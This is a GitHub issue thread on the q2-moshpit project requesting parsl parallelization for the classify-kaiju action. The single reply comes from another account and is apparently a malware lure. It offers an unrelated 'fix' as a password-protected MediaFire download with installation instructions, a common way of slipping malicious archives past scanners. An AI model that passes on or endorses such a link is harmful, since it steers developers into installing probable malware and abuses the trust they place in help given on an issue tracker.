### ISSUE TITLE
ENH: parallelize classification with Kaiju

### ISSUE THREAD

**Issue by misialq** [bokulich-lab/q2-moshpit#199]
It would be super lovely if we could introduce parsl parallelization into the `classify-kaiju` action, similarly to how it's done with Kraken and some other actions.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
